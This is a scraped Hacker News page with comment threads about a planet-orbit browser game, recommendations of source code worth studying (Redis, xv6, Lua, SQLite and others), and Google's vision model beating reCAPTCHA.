Got to 1.2 billion 500 years, but it took forever. Next challenge: fastest possible completion with the highest score possible.
25
guybrushT 2 days ago 1 reply      
137 million fake points, 500 years, 1 addictive game. http://www.stefanom.org/spc/?view=3032407

A very simple and elegant idea. Well done.

26
notduncansmith 2 days ago 0 replies      
I found a bug: http://puu.sh/8arsr.png

The very first planet started on the absolute edge, then when I added a Dwarf Star pretty close to the Sun, it altered the orbit such that the planet went out of bounds but it didn't kill me.

27
Shivetya 2 days ago 3 replies      
looking at the high scores they all seem to be just exploiting the rules or a bug. Can those types of attempts be filtered?
28
dpeck 2 days ago 0 replies      
Looks like something that would translate over to ipad/iphone really well.
29
thix0tr0pic 2 days ago 2 replies      
30
srg0 2 days ago 1 reply      
It seems that running on the fastest possible setting helps to avoid (skip) most collisions by making them near-collisions.

P.S. Got to 430 years.

31
piyush_soni 2 days ago 0 replies      
Has someone created a mirror of the site yet which works? It's not opening up for me as usual, the HN effect.
32
ch4s3 2 days ago 0 replies      
dumping a bunch of super-earths into the same orbit around a dwarf star seems to work well. 125.8 years

http://www.stefanom.org/spc/?view=2906533

33
reshambabble 2 days ago 1 reply      
This is great, but I'd suggest having an instructional module as soon as a user signs on with more details about the different planet sizes, what they mean, and what the "actual" distance would be between the center and the 2AU barrier.
34
z3phyr 2 days ago 0 replies      
I always get carried away, and disrupt the equilibrium of earth like planets in the habitable zone with a brown dwarf :(
35
personjerry 2 days ago 0 replies      
I have found that starting a new game takes a significant amount of time due to load. One way to remedy this is by enabling Work Offline on your browser and simply refreshing the cached version.
36
easy_rider 2 days ago 1 reply      
Omg this is so awesome, and framestyle style website with retro coloring <3
37
FrejNorling 2 days ago 0 replies      
Got 7 bodies and 500 points... =)

http://screenpresso.com/=XTGMc

38
ycui1986 2 days ago 0 replies      
39
simonhorlick 2 days ago 0 replies      
41
jgeorge 2 days ago 0 replies      
This is great, fantastic work stefanom! I'm already addicted to it.
42
honksillet 2 days ago 0 replies      
Doesn't seem to be working on any of the browsers on my mac
43
cos2pi 2 days ago 1 reply      
I get NaNs when I put a Dwarf star as close as I can to the parent star. Perhaps a black hole is generated? :) http://www.stefanom.org/spc/?view=3069947
44
Crito 2 days ago 0 replies      
What physics model is being used for this? I can't seem to get tidal acceleration to work properly (it seems to for the first orbit, then it doesn't change.)
45
ch4s3 2 days ago 0 replies      
and we broke it
46
bagels 2 days ago 1 reply      
If you don't want to kill your site, you should make it possible to start a new game without reloading the whole page.
22
Ask HN: What source code is worth studying?
316 points by SatyajitSarangi  21 hours ago   146 comments top 69
1
sillysaurus3 20 hours ago 8 replies      
== Vim or Emacs ==

Just pick one and force yourself to use it to the exclusion of other editors. Future you will thank you later, because you'll still be using it 20 years from now. "We are typists first, programmers second" comes to mind. You need to be able to move chunks of code around, substitute things with regexes, use marks, use editor macros, etc.

== 6.824: Distributed Systems ==

http://pdos.csail.mit.edu/6.824-2013/ Do each lab. Read the discussion and rtm's course notes.

== Tarsnap ==

https://www.tarsnap.com/download.html How to write C. Study the "meta," that is, the choice of how the codebase is structured and the ruthless attention to detail. Pay attention to how functions are commented, both in the body of the function and in the prototypes. Use doxygen to help you navigate the codebase. Bonus: that'll teach you how to use doxygen to navigate a codebase.

== xv6 ==

http://pdos.csail.mit.edu/6.828/2012/xv6.html

http://pdos.csail.mit.edu/6.828/2012/xv6/xv6-rev7.pdf

http://pdos.csail.mit.edu/6.828/2012/xv6/book-rev7.pdf

Read the book. Force yourself to read it in its entirety. Use the source code PDF to study how to turn theory into practice.

== Arc ==

http://ycombinator.com/arc/arc3.1.tar

You're not studying Arc to learn Arc. You're studying Arc to learn how to implement Arc. You'll learn the power of anaphoric macros. You'll learn the innards of Racket.

Questions to ask yourself: Why did Racket as a platform make it easier to implement Arc than, say, C/Golang/Ruby/Python? Now pick one of those and ask yourself: what would be required in order to implement Arc on that platform? For example, if you say "C," a partial answer would be "I'd have to write my own garbage collector," whereas for Golang or Lua that wouldn't be the case.

The enlightenment experience you want out of this self-study is realizing that it's very difficult to express the ideas embodied in the Arc codebase any more succinctly without sacrificing its power and flexibility.

Now implement the four 6.824 labs in Arc. No, I'm not kidding. I've done it. It won't take you very long at this point. You'll need to read the RPC section of Golang's standard library and understand how it works, then port those ideas to Arc. Don't worry about making it nice; just make it work. Port the lab's unit tests to Arc, then ensure your Arc version passes those tests. The performance is actually not too bad: the Arc version runs only a few times slower than the Golang version if I remember correctly.

== Matasano crypto challenges ==

http://www.matasano.com/articles/crypto-challenges/ Just trust me on this one. They're cool and fun and funny. If you've ever wanted to figure out how to steal encrypted song lyrics from the 70's, look no further.

== Misc ==

(This isn't programming, just useful or interesting.)

Statistics Done Wrong http://www.statisticsdonewrong.com/

A Mathematician's Apology http://www.math.ualberta.ca/mss/misc/A%20Mathematician's%20A...

Surely You're Joking, Mr. Feynman http://web.archive.org/web/20050830091901/http://www.gorgora...

Zen and the Art of Motorcycle Maintenance http://www.arvindguptatoys.com/arvindgupta/zen-motorcycle.pd...

== Above All ==

Don't fall in love with studying theory. Practice. Do what you want; do what interests you. Find new things that interest you. Push yourself. Do not identify yourself as "an X programmer," or as anything else. Don't get caught up in debates about what's better; instead explore what's possible.

2
stiff 20 hours ago 1 reply      
I think you get more benefit from reading code if you study something very close to what you are working on yourself, something in the same domain, in the same framework perhaps, or at least in the same programming language, at best something you are deeply involved in currently.

I never seem to get enough motivation to read deeply into random "grand" code bases like Lua or SQLite, but some months ago I got into the habit of always studying a bunch of projects that use a given technology before I use this technology, and it greatly decreased the amount of time it takes me to get to an "idiomatic" coding style. So instead of diving in at random, I would recommend making researching existing code-bases related to what you are currently doing an integral part of your workflow.

3
willvarfar 20 hours ago 1 reply      
Fabien Sanglard http://fabiensanglard.net has some excellent code reviews on his website, particularly games.

You could read some of the code-bases he reviews, and then read his review. You'll be able to compare and contrast your opinions with his, and if there's interesting variation you can blog about it ;)

4
robin2 17 hours ago 0 replies      
Slightly off topic, but Peter Seibel's take on the idea of code reading groups, and the idea of code as literature, is interesting: http://www.gigamonkeys.com/code-reading/

"Code is not literature and we are not readers. Rather, interesting pieces of code are specimens and we are naturalists. So instead of trying to pick out a piece of code and reading it and then discussing it like a bunch of Comp Lit. grad students, I think a better model is for one of us to play the role of a 19th century naturalist returning from a trip to some exotic island to present to the local scientific society a discussion of the crazy beetles they found."

The reason this is off topic is that it sounds like you were after interesting specimens anyway. I don't have any code examples as such, although if algorithms count I'm particularly fond of Tarjan's algorithm for finding strongly connected components in a directed graph, and the Burrows-Wheeler transform (as used in bzip).

5
fotcorn 20 hours ago 2 replies      
The Architecture of Open Source Applications book[0] gives a high level overview on many open source projects. It's a good starting point to dive into the code of these projects.

[0] http://aosabook.org/en/index.html

6
oneeyedpigeon 18 hours ago 1 reply      
To mix things up a bit, I'm going to give two very small examples of code that can be understood quickly, but studied diligently. Both are in JavaScript, which I notice you mention specifically in another comment:

[1] Douglas Crockford's JSON parser. Worth a look because it is excellently commented and is easily understandable https://github.com/douglascrockford/JSON-js/blob/master/json...

[2] Bouncing Beholder. A game written in 1K of highly obfuscated code, which the author expands upon here. Worth it because it teaches some crazy optimisation techniques that are applicable to all programming, but also includes plenty of javascript-specific trickery. http://marijnhaverbeke.nl/js1k/

7
dailo10 15 hours ago 1 reply      
Python Sudoku Solver by Peter Norvig -- an elegant solution in one page of code. When I read this, I felt like code is art.

http://norvig.com/sudoku.html

8
davidw 19 hours ago 0 replies      
I'm partial to the Tcl C code:

https://github.com/tcltk/tcl/blob/master/generic/tclFCmd.c

It's very nicely commented and has a nice, easy to read style throughout (except for the regexp files).

9
raverbashing 16 hours ago 0 replies      
The Linux Kernel

Very clean (mostly) and very revised C code, following a strict code convention

(Of course it's kernel code, so some things don't apply to userspace, still)

10
pcx 20 hours ago 0 replies      
I've heard lots of people sing praises for Redis source - https://github.com/antirez/redis. A cursory look into the source shows a very well documented code-base. It's one of the top items in my to-read-some-day list. Salvatore is an excellent C programmer and takes a lot of pain in writing good documentation, despite his not so great English skills. A shout out for him, thanks for setting an example.
11
spacemanmatt 14 hours ago 1 reply      
Please enjoy the source code of PostgreSQL (any version, but latest is generally recommended) core. It is very well factored, and typically also very well commented. This community cares a great deal about code quality, because they are so clear on the relation between readability, diagnosability, and execution correctness.
12
pavlov 19 hours ago 0 replies      
I learned a lot from the Cocotron source:

https://code.google.com/p/cocotron/source/browse

It's a free cross-platform implementation of Apple's Cocoa, so there's a lot of stuff there. But the project is well organized, and almost everything is written in a minimalist oldschool Objective-C style.

I've looked at some other cross-platform frameworks, and they are often hard to understand because they have been developed by a large group of developers and include lots of complex optimizations and platform-specific code paths. Cocotron is not as finely tuned as Apple's CoreFoundation (for example), but much more readable.

13
oscargrouch 10 hours ago 0 replies      
My personal list (mostly imperative languages)

C++: (Complex software with elegance + performance)

  Dart source code
  V8 source code (Same people as Dart)
  LevelDB
  Chrome (the only downside: too much virtual dispatch -> "javism")

C:

  SQLite
  Redis
  Nginx
  Solaris and FreeBSD

Java:

  Rich Hickey implementation of the clojure runtime in Java
  (it was there in 2009.. maybe now this is in clojure itself??)

Go:

  The Go standard libraries

14
SixSigma 16 hours ago 0 replies      
The plan9 operating system

* The lack of ifdef's that make cross compiling a breeze

* It is easy to understand, compared to reading the Linux kernel

http://plan9.bell-labs.com/sources/plan9/sys/src/

15
biscarch 11 hours ago 1 reply      
Erlang: Riak https://github.com/basho/riak
Riak is actually a layering of a few different projects including Riak KV, Yokozuna (Solr), Riak Core, etc. It was grown out of the Dynamo paper.

Haskell: Snap https://github.com/snapframework/snap
Snap is another project built in layers (snap-server, io-streams, snaplets, snap-core). The 1.0 release makes some pretty massive structural changes behind the scenes with minimal breakage of the public API, and io-streams is a very nice API to work with.

JavaScript: Underscore.js http://underscorejs.org/docs/underscore.html
Underscore is a utility library that gives a nice overview of various techniques in JS, such as how to handle equality, use of apply, ternary operators, etc. Many functions have fallbacks to ECMAScript 5 native functions.

16
Locke1689 10 hours ago 0 replies      
http://source.roslyn.codeplex.com/ for high performance, immutable C# code.

You'll see some differences from more relaxed C# projects (e.g., we avoid allocations like the plague), but I'd say we have pretty good style. ;)

17
fit2rule 19 hours ago 2 replies      
The sources to Lua are pretty darn great:

http://www.lua.org/source/5.2/

18
olalonde 18 hours ago 0 replies      
Javascript/Node.js: pretty much anything written by https://github.com/visionmedia (his less popular libraries are not very well commented though) https://github.com/jashkenas/underscore

Scheme (and functional programming in general): examples/exercises from the SICP book

19
AhtiK 16 hours ago 2 replies      
Python => SQLAlchemy

Very clean, feature-rich yet pragmatic and well documented. https://github.com/zzzeek/sqlalchemy

20
projectileboy 15 hours ago 1 reply      
I'd echo the advice to read the Arc source, and I'd add the various versions of Quake (C, C++). I learned a lot reading John Carmack's code.
21
rch 14 hours ago 0 replies      
Take a look at Redis sometime. You might want to actually work on it a bit to help internalize what you're reading. Here are a couple of articles that might help get you started:

http://pauladamsmith.com/articles/redis-under-the-hood.html

http://www.starkiller.net/2013/05/03/hacking-redis-adding-in...

22
lamby 17 hours ago 0 replies      
"Beautiful Code" is worth a read-through, particularly for the commentary.

(One thing that I still remember years on is the "drop of sewage" example.)

23
maccard 2 hours ago 0 replies      
I'm interested in Game Development, specifically physics simulation and graphics programming. The box2D code (C) is fantastic.
24
rabino 3 hours ago 0 replies      
https://github.com/norman/friendly_id

To learn how to document code.

25
budu3 9 hours ago 0 replies      
The old jQuery 1.6.2 code by John Resig is a good start for studying good JavaScript coding practices http://robflaherty.github.io/jquery-annotated-source/
26
agentultra 14 hours ago 0 replies      
Anything you find interesting or find yourself using frequently.

A less glib answer try Brogue: https://sites.google.com/site/broguegame/

A very interesting roguelike with interesting constraint-based features.

27
agumonkey 20 hours ago 0 replies      
I really enjoyed skimming through Ian Piumarta's Maru, a Lisp in C, very pretty code, very concise. (I already mentioned it in other topics)

http://piumarta.com/software/maru/

28
paulrademacher 9 hours ago 1 reply      
Any suggestions for smaller codebases? A lot of these are great and you'll pick up idioms here and there, but they're massive.
29
betterunix 15 hours ago 0 replies      
SBCL or CMUCL -- Lisp compilers written in Lisp.
30
kjs3 14 hours ago 0 replies      
I learned a huge amount about how real operating systems are put together and the compromises that get made by reading the V6 Unix source via John Lions Commentaries (yes...I had a photocopied copy). Made exploring the BSD 4.2 and 4.3 source trees (another worthwhile exercise) much easier. I suppose if I was starting out today and not in 1985 I'd look at xv6 or Minix.
31
twelvechairs 19 hours ago 0 replies      
The most interesting things to read are those where a programmer has done something cleverly, but this only needs to happen when your language or libraries make it hard for you to begin with. Aside from low-level performance intensive functions, the best code is not interesting to read - it just reads like statements of fact.
32
hiisi 18 hours ago 0 replies      
C -> Redis

I haven't written any C for years, but really enjoyed skimming through Redis codebase, it's so clean, easily understandable and extensible.

33
villek 17 hours ago 2 replies      
I found the annotated source code of the underscore.js to be very educational: http://underscorejs.org/docs/underscore.html
34
tlrobinson 11 hours ago 2 replies      
Lots of great suggestions here, but I'm interested in how you go about reading source code, especially very large codebases?
35
patrickg 15 hours ago 0 replies      
I suggest the source code of TeX. Not new, but still very interesting to read.

source that needs some postprocessing (tangle/weave):

http://mirrors.ctan.org/systems/knuth/dist/tex/tex.web

PDF from the source (including hyperlinks)

https://www.tug.org/texlive/devsrc/Master/texmf-dist/doc/gen...

36
riffraff 16 hours ago 0 replies      
Not a specific codebase, but I went through "Code Reading"[0] many years ago, I found it interesting. Most reviews are not very positive though, so maybe it was just at the right point for me.

[0] http://www.amazon.com/Code-Reading-Open-Source-Perspective/d...

37
DalekBaldwin 16 hours ago 1 reply      
Honestly, aside from learning to express a few extremely specific patterns in your language of choice concisely and elegantly and reminding yourself of the existence of certain libraries and utility functions so you don't accidentally waste time reinventing them, I think reading source code is a pretty useless exercise unless you also have a detailed record of how that source code came to exist in its present form. Until there is some revolutionary new tool for generating a human-understandable narrated history of large-scale design decisions from a source control history, your time will almost certainly be better spent reading textbooks that incrementally develop a piece of software over several chapters. Even that is cheating -- the authors know exactly where they want to end up and they won't include all the missteps they made when they first started writing similar programs. But it's still loads better than the alternative. Just as sitting in a law school library absorbing an encyclopedic knowledge of the law won't really train you to make arguments that will fly in front of a judge, reading a code base as a dead, unchanging document won't teach you what it is to live in that code.
38
nicholassmith 19 hours ago 0 replies      
I had a read through the PCSX2 emulator recently, that was quite interesting: https://github.com/PCSX2/pcsx2 it's a complex project in what was surprisingly readable C++ code.
39
nextos 9 hours ago 0 replies      
I think 2 suggestions by plinkplonk in the original thread would be still relevant:

Common Lisp - "Paradigms of Artificial Intelligence Programming" by Peter Norvig and "On Lisp" by Paul Graham

C - "C Interfaces and Implementations"

Minix 1 and XMonad are also very good suggestions too.

40
davedx 18 hours ago 1 reply      
* BackboneJS

* UnderscoreJS

41
rasur 11 hours ago 0 replies      
Anything by Fabrice Bellard (Google him, it's worth it).
42
jacquesm 20 hours ago 5 replies      

  C -> Varnish
  PHP -> Yii
  Ruby -> Merb
  Scheme -> Arc
  Clojure -> Core
  JavaScript -> Multeor

Any languages in particular that you're interested in not covered above?

43
chris_wot 14 hours ago 0 replies      
It's not great code (though I'm working to make it so), and perhaps not the intent of this question - but if you want to look at a 25+ year old codebase that's being refactored, check out LibreOffice, especially the VCL component:

http://cgit.freedesktop.org/libreoffice/core/log/vcl/

44
redox_ 17 hours ago 0 replies      
For all low-level I/O details (fflush/fsync/fsyncdata on files/directories after creation/renaming), I used to read MySQL routines, pretty simple to understand: https://github.com/twitter/mysql/tree/31d6582606ddf4db17ad77...
45
entelect 18 hours ago 0 replies      
46
collyw 18 hours ago 1 reply      
Slight tangent to your question, but one thing I have noticed recently is that having to deal with really crap code inspires me to do my own better.

I inherited a colleague's work after she left, and it was horrible. But I thought about why it was horrible, and how to make it better. What would it look like if it was done well?

Even with my own code, if I look at something I did 6 months ago, and it doesn't make sense straight away, then it can usually be improved.

47
pincubator 10 hours ago 1 reply      
Also can someone suggest what is the best way to approach code reading? When I open a library in Python, I am not sure where to start reading, just a bunch of files. Should I randomly pick one file and start reading from there? Is there any common strategy?
48
j_s 14 hours ago 0 replies      
In the .NET world, shanselman has a series of Weekly Source Code blog posts and most recently posted a list of seven 'interesting books about source and source code'.

http://www.hanselman.com/blog/CategoryView.aspx?category=Sou...

49
laichzeit0 19 hours ago 0 replies      
Eric S. Raymond wrote a book The Art of Unix Programming [1] that has many "case studies" as well as recommendations of which software/RFCs are particularly worthy of study.

[1] http://www.faqs.org/docs/artu/

50
lightyrs 10 hours ago 0 replies      
I find anything by https://github.com/jashkenas to be transparent and enlightening.
51
qwerta 10 hours ago 0 replies      
For Java I highly recommend H2 SQL DB. It has everything (parsers, sockets, webui...) in very tight and nice package.
52
twunde 14 hours ago 1 reply      
For PHP, I've been very impressed by Phabricator's code (and the related phutils library). It's worth looking at the git commits as well to see just how clean and structured commits can be. I'm much more impressed by it than by any PHP framework code I've read (and I've read Zend, Symfony2, li3, codeigniter as well as custom frameworks).
53
snarfy 11 hours ago 0 replies      
If you are interested in rendering engines I suggest Irrlicht. It's fairly clean and easy to understand.
54
diegoloop 19 hours ago 0 replies      
I made this tool: http://codingstyleguide.com to improve the way I code for different languages and not get lost with too much programming information and it's helping me a lot.
55
raju 15 hours ago 1 reply      
Any suggestions for Clojure projects?

[Update: Oops. I missed the "Clojure -> Core" by jacquesm]

56
vishnugupta 20 hours ago 0 replies      
I'm fascinated by concurrent programming. I find that reading classes from Java's java.util.concurrent package gives me very good practical insights as to what goes into building a concurrent class. My all time favorite is ConcurrentHashMap :)
57
borntyping 18 hours ago 0 replies      
Python: Flask (and related projects)
58
Hydraulix989 20 hours ago 1 reply      
C -> nginx

C++ -> Chrome
59
dfkf 18 hours ago 0 replies      
OpenSSL
60
eadler 3 hours ago 0 replies      
FreeBSD kernel & userland
61
dschiptsov 17 hours ago 1 reply      
nginx/src/os/unix/
62
db48x 18 hours ago 0 replies      
TeX the Book is good, even if it is in Pascal.
63
s_dev 19 hours ago 0 replies      
I've heard that reading the Git source code is very beneficial but haven't done it myself yet.
64
ddz 10 hours ago 0 replies      
Find yourself a copy of this. Not only did it play a crucial role in the history of the UNIX/Linux world, it is a gold mine for understanding operating systems.

http://en.wikipedia.org/wiki/Lions%27_Commentary_on_UNIX_6th...
65
willvarfar 19 hours ago 1 reply      
(You say the 'naive' way; how can it be compressed better?)
66
RhysU 6 hours ago 0 replies      
FFTW.
67
visualR 19 hours ago 0 replies      
Xournal
68
marincounty 14 hours ago 0 replies      
Get to know the command line before you start any language.
69
plicense 18 hours ago 0 replies      
Everything at Google.
23
Google's Street View computer vision can beat reCAPTCHA with 99% accuracy googleonlinesecurity.blogspot.com
315 points by apawloski  1 day ago   145 comments top 45
1
zwegner 1 day ago 13 replies      
This particular issue (AI performance on captchas) is really quite fascinating. It's an arms race, but the problem is, only one side can win. Google is claiming they have improved their system in some (understandably) unspecified way, but there's only so far this can go. Captchas need to detect whether someone is human, but it has to work for everyone, ideally, even those with disabilities. Any simple task a human can do will eventually be able to be automated. Tasks that aren't currently feasible to be automated, say some natural language processing tasks, have another problem: scalability. To prevent simple databases of problems -> solutions, the problems need to be generated en masse, and for cheap, which means a computer needs to generate the solutions in the first place. And of course, paying people to just do captchas all day already happens.

The street address/book scan approach that Google uses is interesting in that the exact solution is not known, so they presumably have to be somewhat forgiving in accepting answers (as their machine learning might have gotten it wrong). Perhaps this is what their "risk analysis" refers to--whether their response seems "human" enough according to their data, not necessarily whether it's correct.

I don't see a way around this problem for free services that still preserves privacy (so directly using some government-issued ID is off the table). Maybe some Persona-like digital signature system, where a person can go to a physical location with a government ID, and get a signature that says "Trusted authority X affirms that person Y is in fact a person". Obviously this still has problems, as you need to trust X, and it's a big pain in the ass.

There are parallels to the realm of passwords, which are also becoming obsolete (not that there's a good replacement...). Anything that a human can feasibly remember for a bunch of sites is becoming easier and easier for computers to guess.

So basically, computers are taking over the world, and we can't do anything to stop it. God help us all.

2
josho 1 day ago 2 replies      
Interestingly I activated a new gmail account today and during the signup process I experienced the obligatory captcha. It was in two parts, the first looked strikingly like a street view picture of a house number, while the second looked like a traditional captcha.

I suspect that google has been using techniques like this to validate their computer vision conclusions. Which makes their 99% assertion even more interesting, because it's likely 99% confirmed by a very large crowd sourced data set, not simply a staff member going through several hundred samples to come up with the success rate.

3
jrochkind1 1 day ago 2 replies      
From that caption "CAPTCHA images correctly solved by the algorithm", there are at least two of them that I'm not sure _I_ can correctly solve on the first try.

Which is generally my experience with captchas these days, I only have about a 50% success rate.

CAPTCHA is a failed strategy, time to give it up.

4
adyus 1 day ago 4 replies      
In effect, Google computer vision got so good that they made their own system obsolete. This is a good thing.

I still think the only reliable way to confirm identity (or humanity) online is an email or SMS verification. Recently, receiving a 2-factor SMS code took less time than the page refresh prompting me to enter it.

5
zobzu 1 day ago 1 reply      
The program solves captcha that I, as a human, cannot solve. Pretty sure that means captcha of that type are definitely dead.
6
frik 23 hours ago 0 replies      
Google's reCAPTCHA showed street numbers as one of the two captcha-"words" for more than two years.

For me this was quite annoying to input street numbers of others. It's a privacy issue, it was like helping the NSA spying and one feels bad entering Google's captcha.

What is even more astounding is that Google does not even mention all the crowd sourced "volunteers" that trained their OCR database. As Google use an open OCR software (former HP OCR app from '95) it would be a good choice to publish their data back to the community.

I removed Google captcha on my own sites and implemented my own traditional captcha (on the first sight of it about two years ago).

7
jere 1 day ago 3 replies      
>In this paper, we show that this system is able to accurately detect and read difficult numbers in Street View with 90% accuracy.

> Turns out that this new algorithm can also be used to read CAPTCHA puzzles - we found that it can decipher the hardest distorted text puzzles from reCAPTCHA with over 99% accuracy.

Am I missing something or could we improve CAPTCHAs by mimicking street numbers?

8
dnlbyl 1 day ago 3 replies      
99% is probably better than my success rate with reCAPTCHA...
9
pacofvf 1 day ago 0 replies      
well there are a lot of Resolve CAPTCHA as a Service sites like http://www.9kw.eu/
10
ilitirit 1 day ago 0 replies      
To be honest, I can't even solve those reCAPTCHAs on that page (that's one of my biggest gripes about reCAPTCHA). I think we're nearing a point in time where if some(thing) can solve a particularly hard CAPTCHA, we can safely assume that it's not human.
11
msvan 18 hours ago 1 reply      
Here's a captcha idea: make people write a 100-word essay on a specific topic. If it's good, you're accepted and you won't have to do it again. If it's bad, you're either a computer or cheap Nigerian labor. When we get to the point where we can't distinguish a computer from a human, we'll just let them be a part of the community.
12
dlsym 1 day ago 0 replies      
"CAPTCHA images correctly solved by the algorithm" - Ok. Now I have to consider the possibility of being a machine.
13
pestaa 10 hours ago 0 replies      
Folks, I figured it out! Let's use captcha so that visitors can prove they are robots! If you fail these captchas, you must certainly be a human!
14
rasz_pl 19 hours ago 0 replies      
Does google aggregate&correlate data in vision algo?

For example for street numbers they not only have picture of a number, they also have knowledge of all the other numbers on that street and guesses for those other numbers. Easy to guesstimate order of a number by checking neighbouring ones.

Same for book words, they have n-gram database.

http://storage.googleapis.com/books/ngrams/books/datasetsv2....

That's a lot of useful MAP/ML data.

But the example they give for the new captchas all look like random crap, "mhhfereeeem" and the like. It's like they are not interested in structure, just pure geometry of letters/numbers.

15
shultays 15 hours ago 0 replies      
My accuracy is way below 99%, good job Google!

Seriously though, I hope this does not mean there will be harder captchas, current ones are already stupidly hard

16
zatkin 1 day ago 1 reply      
But can it beat CRAPCHA? http://crapcha.com/
17
infinity0 19 hours ago 0 replies      
Ironic how the HTTPS version force-redirects you to HTTP. (Amazon.co.uk started doing this a few days before and it's pissing me off no end.)
18
spullara 21 hours ago 0 replies      
Reminds me of a hack day at Yahoo where one team made a captcha where you had to match a photo with its tags and another team made an algorithm that would assign tags to a photo. Both based on Flickr humans meant that the captcha was easily solvable by the algorithm.
19
spullara 21 hours ago 0 replies      
So, now if you get the captcha right you're a computer, otherwise you are a human?
20
aviraldg 23 hours ago 0 replies      
Isn't this expected (and a natural consequence of the fact that it's trained on huge volumes of reCAPTCHA data?)
21
aaronbrethorst 1 day ago 0 replies      
I'm impressed that their address identification algorithm can solve those CAPTCHAs. I can't make heads or tails of them.
22
mrsaint 1 day ago 2 replies      
Captchas were meant to keep spammers at bay. Unfortunately, that's no longer the case. Thanks to "cloud technology" like DeathByCaptcha - that is, people in countries where labor is cheap solving captchas all day - spammers have no problem getting through reCaptcha-protected sites and forums to do their mischief.

As a result, reCaptcha & co tend to be more of an annoyance to honest visitors than to spammers.

23
rasz_pl 19 hours ago 0 replies      
>CAPTCHA images correctly solved by the algorithm

well, isn't that great? Because I, HUMAN, can maybe solve _one_ of those (lower right one).

I frickin HATE google Captchas and simply close the page if it wants me to solve one, they are too hard for me.

24
drawkbox 1 day ago 0 replies      
99% is better than most humans captcha accuracy. Back in my day humans could still beat computers at Chess but nowadays computers can beat humans at Jeopardy and drive. Interesting to see when it fully crosses over.
25
plg 1 day ago 1 reply      
Why isn't google releasing the full algorithm?
26
tsenkov 16 hours ago 0 replies      
It's fascinating how, arguably simple software now, which is the captcha, would inevitably become more and more complex as AI develops.
27
daffodil2 1 day ago 1 reply      
Wait, it's not clear to me from the blog post. Did they make a system that obsoletes reCAPTCHA? If so, it's just a matter of time before the spam systems catch up, correct? If so, what's the successor to CAPTCHA? Or is the web just going to be full of spam in the future?
28
aljungberg 19 hours ago 0 replies      
Google software could use their 99% successful algorithm to filter potential captchas. Then show the 1% they can't crack to humans.

Now the race becomes who can write the better captcha solver, Google or the spammers? As spammers learn to identify things in the 1%, Google will hopefully improve faster and continue to narrow the "hard to solve" band.

29
varunrau 1 day ago 0 replies      
I've always felt that it would be only a matter of time before computer vision would be able to solve the (re)CAPTCHA problem. Especially since digit classifiers are able to match the performance of humans.

One approach that I enjoyed seeing was the use of reverse captchas. Here you pose a problem that a computer can easily solve, but a human cannot. For instance, if you ask a simple question (1+1=?), but you place the question box off the screen so the user can't see it. A computer would be able to easily answer the question, but a human user would have no way of doing so.
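
The "reverse captcha" described in the comment above is commonly implemented as a honeypot form field. A server-side sketch follows as an added example (not code from the commenter or anyone in the thread); the field names, the HMAC-derived trap name, the demo secret and the result labels are assumptions made for illustration.

```python
import hashlib
import hmac
import html

# Constructed demo key; a real deployment would load a random secret from configuration.
SECRET = b"demo-secret-not-for-production"


def trap_field_name(session_id: str, secret: bytes = SECRET) -> str:
    """Derive a per-session name for the hidden field, so a script cannot
    hard-code which field name to leave blank."""
    digest = hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()
    return "f_" + digest[:12]


def render_form(session_id: str, secret: bytes = SECRET) -> str:
    """Return the form: one visible comment box plus the trap question,
    moved off screen, hidden from screen readers and skipped by the Tab key
    so that people using assistive technology are not caught by it."""
    trap = html.escape(trap_field_name(session_id, secret), quote=True)
    return (
        '<form method="post" action="/comment">\n'
        '  <textarea name="comment"></textarea>\n'
        '  <div style="position:absolute; left:-10000px" aria-hidden="true">\n'
        f'    <label>1+1=? <input name="{trap}" tabindex="-1" autocomplete="off"></label>\n'
        '  </div>\n'
        '  <button type="submit">Post</button>\n'
        '</form>'
    )


def classify_submission(form: dict, session_id: str, secret: bytes = SECRET) -> str:
    """Classify a parsed POST body (field name -> string value).

    A browser submits an untouched text input as an empty string, so:
      - trap field absent    -> the form was not submitted as rendered
      - trap field non-empty -> something filled in a box no person could see
    This only filters scripts that fill every field; automation that renders
    the page like a browser leaves the trap empty and passes.
    """
    trap = trap_field_name(session_id, secret)
    if trap not in form:
        return "reject-malformed"
    if form[trap].strip():
        return "reject-automated"
    if not form.get("comment", "").strip():
        return "reject-empty"
    return "accept"


if __name__ == "__main__":
    sid = "session-1234"  # constructed sample session identifier
    trap = trap_field_name(sid)
    print(render_form(sid))
    print(classify_submission({"comment": "Nice article", trap: ""}, sid))
    print(classify_submission({"comment": "Buy pills", trap: "2"}, sid))
```
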

30
pavelrub 1 day ago 0 replies      
This is essentially the technology that was discussed here 3 months ago [1], and it links to the exact same article on arxiv, titled: "Multi-digit Number Recognition from Street View Imagery using Deep Convolutional Neural Networks". [2]

The new addition to the article is that now they have tested the same type of NN on reCAPTCHA, and (perhaps unsurprisingly) it works.

[1] - https://news.ycombinator.com/item?id=7015602

[2] - http://arxiv.org/abs/1312.6082v4.

31
northisup 1 day ago 0 replies      
Yet it says I'm a robot a good two of three times.
32
leccine 1 day ago 0 replies      
33
stuaxo 1 day ago 0 replies      
I'm sorry, as a human I have had to fill these street view style captchas in all the time for google, so this is hardly a completely artificial intelligence, humans have done it many many times, in fact I'm sure some of the pictures in the articles have come up.
34
blueskin_ 20 hours ago 0 replies      
Great... now they are going to get even harder to actually do.
35
exadeci 20 hours ago 0 replies      
You're welcome google (we are the lab rats that taught their system how to read)
36
peterbotond 1 day ago 0 replies      
what if someone has bad eyes or some rare eye problem and can not solve captcha problems at all? in other words fails captcha 90% of times.
37
vfclists 17 hours ago 0 replies      
Google are getting too creepy for any sensible person's liking. Addresses which are off the street in apartment complexes are now getting recognized as well.

Whenever I see these kind of captchas I switch to audio captchas. It is rather unethical for Google to use recaptchas in this way.

38
EGreg 1 day ago 0 replies      
Basically consider why we want to eliminate computers from accessing the sites -- because we want to make account creation expensive, to prevent sybil attacks and giving away scarce resources.

What is expensive? Reputation. That's where credit money's value comes from.

I wrote a more comprehensive piece here, in case anyone's interested: https://news.ycombinator.com/item?id=7601690

39
Keyframe 1 day ago 2 replies      
Now that programs are better and better at solving CAPTCHA - that means that correct CAPTCHA input will mean the opposite from what it means now. Since programs are better at solving CAPTCHA than humans, correct input (3/3 for example) will mean it's a robot. Thus, CAPTCHA becomes relevant again.
40
knodi 1 day ago 1 reply      
I just came here to say fuck reCAPTCHA! I hate it, I can't read it with my human eyes.
41
sajithdilshan 1 day ago 0 replies      
Skynet
42
spcoll 22 hours ago 0 replies      
It's a new success for Deep Learning. It seems to be actually 99.8% accuracy according to their paper: http://arxiv.org/abs/1312.6082

That's one order of magnitude higher.

43
conectorx 1 day ago 0 replies      
